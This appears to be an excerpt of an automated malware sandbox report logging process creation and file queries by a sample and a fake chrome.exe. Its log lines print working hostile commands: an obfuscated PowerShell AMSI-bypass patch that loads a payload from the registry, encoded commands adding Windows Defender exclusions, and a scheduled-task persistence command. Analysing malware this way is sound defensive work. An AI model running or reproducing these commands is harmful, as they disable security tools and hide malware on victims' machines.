Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Source: C:\Windows\System32\dllhost.exe

Code function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,

39_2_0000000140001F00

Source: C:\Windows\System32\dllhost.exe

39_2_0000000140001F00

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\34432.exe	Queries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
